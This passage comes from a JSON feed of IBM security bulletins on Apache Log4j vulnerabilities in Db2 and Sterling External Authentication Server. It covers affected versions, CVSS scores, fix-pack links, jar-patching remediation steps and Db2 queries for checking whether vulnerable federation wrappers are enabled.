e.g. \"del org\\apache\\log4j\\net\\JMSAppender.class\"\n Package the files back into the jar e.g. \"..\\..\\..\\java\\jdk\\bin\\jar xvf ..\\log4j-1.2.17-patched.jar .\"\n Replace the log4j-1.2.17.jar with log4j-1.2.17-patched.jar. e.g. \"cd ..\", \"del log4j-1.2.17.jar\", \"ren log4j-1.2.17-patched.jar log4j-1.2.17.jar\".\n Cleanup the \"tmp\" folder.\n Start the TextSearch server: \"db2ts start for text\" in the Db2 command line. \n \n \n \n \n \n\nFor version 11.1 on linux and unix platforms only (not on Windows), the log4j-1.2.17.jar file under \"/opt/IBM/db2/V11.1/federation/restservice/hadoop\" in the Db2 installation location may be safely removed. \n \n\n\nSubsequent installation of fixpacks may result in the error:\n\nERROR: Some error occurred while moving files during backup or restore to directory, \"/opt/IBM/db2/<version>/.backup\". The return code is \"4394967295\".\n\nTo resolve this apply the fixpack with the -f nobackup flag.\n\nThis file does not exist on Db2 versions prior to 11.1\n\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\nSee [Security Bulletin: A vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6549888> \"Security Bulletin: \u00a0A vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \u00a0\$CVE-2021-44832\$\" )\n\nSee [Security Bulletin: Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-45046, CVE-2021-45105)](<https://www.ibm.com/support/pages/node/6528672> \"Security Bulletin: \u00a0Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \u00a0 \$CVE-2021-45046, CVE-2021-45105\$\" )\n\nSee [Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6526462> \"Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \$CVE-2021-44228\$\" )\n\n## Acknowledgement\n\n## Change History\n\n06 June 2022: Added mitigation to remove log4j from hadoop wrapper on linux/unix and links to other related Log4j bulletins \n31 Jan 2022: Added 10.5 links for Windows 64-bit and Windows 32-bit fix packs. \n31 Dec 2021: Added 10.5 links for AIX 64-bit, Linux 32-bit and Linux 64-bit fix packs. \n29 Dec 2021: Added 11.1.4.6 links for Windows 32-bit and Solaris 64-bit fix packs \n28 Dec 2021: Updated ECM Text Search section to reflect that: text search server should not be stopped or started if the customer is not using text search, and added the instructions to copy the patched jar in place of the original.24 Dec 2021: Removed Install section as impacted as further investigation determined that Installation Manager was not affected by this vulnerability, thus Db2 is not vulnerable from that dependency. Added 11.1.4.6 link for Windows 64-bit fix pack \n22 Dec 2021: Added 10.5 link for Inspur. Clarified server and client impact for each issue \n21 Dec 2021: Added 11.5.6 links for Windows 32-bit and Windows 64-bit fix packs. Added 11.5.7 links for Windows 32-bit and Windows 64-bit fix packs \n21 Dec 2021: Updated note that the 11.5.6 builds are the same as the one for CVE-2021-44228. Updated description of Db2 Text Search update. \n20 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Product\":{\"code\":\"SSEPGG\",\"label\":\"DB2 for Linux- UNIX and Windows\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"10.1, 10.5, 11.1, 11.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-07T14:36:22", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-4104)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-06-07T14:36:22", "id": "E8825B71ACE31BFAA5662E2357C5EEB425BA842AC21E60C761364799BFD2FEE3", "href": "https://www.ibm.com/support/pages/node/6528678", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:18", "description": "## Summary\n\nIBM Sterling External Authentication Server is vulnerable to an arbitrary code execution due to Apache Log4j, which is used for logging (CVE-2021-44832). The fix upgrades all Apache Log4j 1.x to Apache Log4j 2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling External Authentication Server| 6.0.3 \nIBM Sterling External Authentication Server| 6.0.2 \nIBM Sterling External Authentication Server| 2.4.3.2 \n \n\n\n## Remediation/Fixes\n\nProduct| VRMF| iFix| Remediation \n---|---|---|--- \nIBM Sterling External Authentication Server| 6.0.3| iFix 01 Plus Build 141| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \nIBM Sterling External Authentication Server| 6.0.2| iFix 04 Plus Build 214| [Fix Central - 6020](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=6.0.2.0&platform=All&function=all> \"Fix Central - 6020\" ) \nIBM Sterling External Authentication Server| 2.4.3.2| iFix 13 Plus Build 296| [Fix Central - 2432](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=2.4.3.2&platform=All&function=all> \"Fix Central - 2432\" ) \nThis fix also remediates CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832. \n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n07 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6PNW\",\"label\":\"IBM Sterling Secure Proxy\"},\"Component\":\"Sterling External Authentication Server\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"}],\"Version\":\"6.0.3, 6.0.2, 2.4.3.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T19:03:49", "type": "ibm", "title": "Security Bulletin: Apache Log4j vulnerability affects IBM Secure External Authentication Server (CVE-2021-4104)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-07T19:03:49", "id": "B47B01CFCEE320F0AE033C32D22579706D0B59585EDEDF3D908CA06FA3E92084", "href": "https://www.ibm.com/support/pages/node/6538954", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-11T21:28:09", "description": "## Summary\n\nApache Log4j open source library used by IBM\u00ae Db2\u00ae is affected by multiple vulnerabilities that could allow a remote attacker to execute arbitrary code on the system or cause a denial of service. This library is used by the Db2 Federation feature. The fix for the vulnerability is to update the Apache Log4j library to 2.17.0. Please see CVE-2021-4104 for bulletin relating to Log4j V1. Please see CVE-2021-44832 and CVE-2021-44228 for bulletins relating to Log4j V2.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nFix pack levels of IBM Db2 V11.5 for all editions on all platforms are affected only if the following features are configured:\n\nFederation: \n\n * DVM JDBC wrapper driver,\n * NoSQL wrapper driver (for Hadoop),\n * Blockchain wrapper driver (for Hyperledger Fabric, Linux 64-bit, x86-64 only)\n\nIBM Db2 V9.7, V10.1, V10.5 and V11.1 are not affected. Please note that log4j v1.x was removed in a previous build, and customers are strongly recommended to apply those fixes if you are on an older version of Db2. See [Security Bulletin](<https://www.ibm.com/support/pages/node/6528678> \"Security Bulletin\" ) for details. \n\n\nTo determine if Federation is enabled, issue the following:\n\ndb2 get dbm cfg | grep FEDERATED\n\nIf a value of NO is returned, you are not vulnerable.\n\nYou can determine if you are using one of the affected wrappers by performing:\n\nTo determine if the DVM JDBC wrapper is in use, issue the following statement:\n\ndb2 \"select servername from syscat.serveroptions where option = 'DRIVER_CLASS' and setting = 'com.rs.jdbc.dv.DvDriver'\"\n\nIf a servername is returned, then you are using the DVM JDBC wrapper via the DvDriver class.\n\n \nTo determine if the NoSQL hadoop wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.servers where servertype = 'HDFSPARQUET'\" \n\nIf 1 or more rows are returned, then NoSQL hadoop wrapper is in use.\n\nTo determine if the NoSQL Blockchain wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.serveroptions where option='PEER_URL'\"\n\nIf 1 or more rows are returned, then NoSQL Blockchain wrapper is in use.\n\n## Remediation/Fixes\n\nCustomers running any vulnerable fixpack level of an affected Program, V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for the V11.5.6 and V11.5.7 release. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.\n\nNote: These builds supersede the builds provided for resolution to [CVE-2021-44228](<https://www.ibm.com/support/pages/node/6526462> \"CVE-2021-44228\" ) and [CVE-2021-4104](<https://www.ibm.com/support/pages/node/6528678> \"CVE-2021-4104\" )\n\n**Release**| **Fixed in fix pack**| **APAR**| **Download URL** \n---|---|---|--- \nV11.5| TBD| [IT39474](<https://www.ibm.com/support/pages/apar/IT39474> \"IT39474\" )| Special Build for V11.5.6: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13478_135867_DB2-aix64-universal_fixpack-11.5.6.0-FP000%3A427692916793185792&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13478_135868_DSClients-linuxia32-client-11.5.6.0-FP000%3A229400084660469792&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13478_135870_DB2-linuxx64-universal_fixpack-11.5.6.0-FP000%3A138274479725175920&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13478_135866_DB2-linuxppc64le-universal_fixpack-11.5.6.0-FP000%3A979582216771911552&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13478_135869_DB2-linux390x64-universal_fixpack-11.5.6.0-FP000%3A276882097350046112&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13478_135865_DSClients-nt32-client-11.5.6000.1809-FP000%3A661797018354168448&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13478_135864_DB2-ntx64-universal_fixpack-11.5.6000.1809-FP000%3A583179472819140992&includeSupersedes=0> \"Windows 64-bit, x86\" ) \n \nV11.5| 11.5.8| [IT39474](<https://www.ibm.com/support/pages/apar/IT39474> \"IT39474\" )| <https://www.ibm.com/support/pages/node/6830623> \n \n \n## Workarounds and Mitigations\n\nNone.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\nSee [Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-4104)](<https://www.ibm.com/support/pages/node/6528678> \"Security Bulletin: \u00a0Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \u00a0 \$CVE-2021-4104\$\" )\n\nSee [Security Bulletin: A vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6549888> \"Security Bulletin: \u00a0A vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \u00a0\$CVE-2021-44832\$\" )\n\nSee [Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6526462> \"Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \$CVE-2021-44228\$\" )\n\n## Acknowledgement\n\n## Change History\n\n11 Nov 2022: Updated 11.5 links to 11.5.8 \n06 June 2022: Added cross reference to other Log4j bulletins \n28 Jan 2022: Added clarification for not affected versions. \n27 Dec 2021: Added 11.5.6 link for Windows 64-bit fix pack \n24 Dec 2021: Added 11.5.7 links for Windows 32-bit and Windows 64-bit fix packs \nAdded 11.5.6 link for Windows 32-bit fix pack \n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Product\":{\"code\":\"SSEPGG\",\"label\":\"DB2 for Linux- UNIX and Windows\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"11.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-11T17:20:42", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-45046, CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-11-11T17:20:42", "id": "CDB95A8580AD247B239607B2769A506C10A81055AF8F4063AA0D26A850A33B58", "href": "https://www.ibm.com/support/pages/node/6528672", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-11T21:28:06", "description": "## Summary\n\nThe Apache Log4j open source library used by IBM\u00ae Db2\u00ae is affected by a vulnerability that could allow a remote attacker to execute arbitrary code on the system. This library is used by the Db2 Federation feature. The fix for the vulnerability is to update the log4j library to version 2.17.1. Please see CVE-2021-4104 for bulletin relating to Log4j V1. Please see CVE-2021-45046, CVE-2021-45105 and CVE-2021-44228 for bulletins relating to Log4j V2.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nFix pack levels of IBM Db2 V11.5 for all editions on all platforms are affected only if the following features are configured:\n\nFederation: \n\n * DVM JDBC wrapper driver,\n * NoSQL wrapper driver (for Hadoop),\n * Blockchain wrapper driver (for Hyperledger Fabric, Linux 64-bit, x86-64 only)\n\nIBM Db2 V9.7, V10.1, V10.5 and V11.1 are not affected by this issue. Please note that log4j v1.x was removed in a previous build, and customers are strongly recommended to apply those fixes if you are on an older version of Db2. See [Security Bulletin](<https://www.ibm.com/support/pages/node/6528678> \"Security Bulletin\" ) for details.\n\nTo determine if Federation is enabled, issue the following:\n\ndb2 get dbm cfg | grep FEDERATED\n\nIf a value of NO is returned, you are not vulnerable.\n\nYou can determine if you are using one of the affected wrappers by performing:\n\nTo determine if the DVM JDBC wrapper is in use, issue the following statement:\n\ndb2 \"select servername from syscat.serveroptions where option = 'DRIVER_CLASS' and setting = 'com.rs.jdbc.dv.DvDriver'\"\n\nIf a servername is returned, then you are using the DVM JDBC wrapper via the DvDriver class.\n\n \nTo determine if the NoSQL hadoop wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.servers where servertype = 'HDFSPARQUET'\" \n\nIf 1 or more rows are returned, then NoSQL hadoop wrapper is in use.\n\nTo determine if the NoSQL Blockchain wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.serveroptions where option='PEER_URL'\"\n\nIf 1 or more rows are returned, then NoSQL Blockchain wrapper is in use.\n\n## Remediation/Fixes\n\nCustomers running any vulnerable fixpack level of an affected Program, V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for the V11.5.6 and V11.5.7 release. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.\n\n**Release**| **Fixed in fix pack**| **APAR**| **Download URL** \n---|---|---|--- \nV11.5| TBD| [IT39584](<https://www.ibm.com/support/pages/apar/IT39584> \"IT39584\" )| Special Build for V11.5.6: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13806_140511_DB2-aix64-universal_fixpack-11.5.6.0-FP000%3A845800489744802176&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13806_140509_DSClients-linuxia32-client-11.5.6.0-FP000%3A517046716861436544&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13806_140512_DB2-linuxx64-universal_fixpack-11.5.6.0-FP000%3A956085215716772224&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13806_140513_DB2-linuxppc64le-universal_fixpack-11.5.6.0-FP000%3A437126386150870272&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13806_140510_DB2-linux390x64-universal_fixpack-11.5.6.0-FP000%3A526111219902489984&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13806_140508_DSClients-nt32-client-11.5.6000.1809-FP000%3A411600865803667264&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13806_140507_DB2-ntx64-universal_fixpack-11.5.6000.1809-FP000%3A273075359147908384&includeSupersedes=0> \"Windows 64-bit, x86\" ) \n \nV11.5| 11.5.8| [IT39584](<https://www.ibm.com/support/pages/apar/IT39584> \"IT39584\" )| \n\n<https://www.ibm.com/support/pages/node/6830623> \n \n## Workarounds and Mitigations\n\nOn a Unix-type system, if you are not using Federation wrappers, you can remove log4j jar files. \n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\nSee [Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-4104)](<https://www.ibm.com/support/pages/node/6528678> \"Security Bulletin: \u00a0Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \u00a0 \$CVE-2021-4104\$\" )\n\nSee [Security Bulletin: Multiple 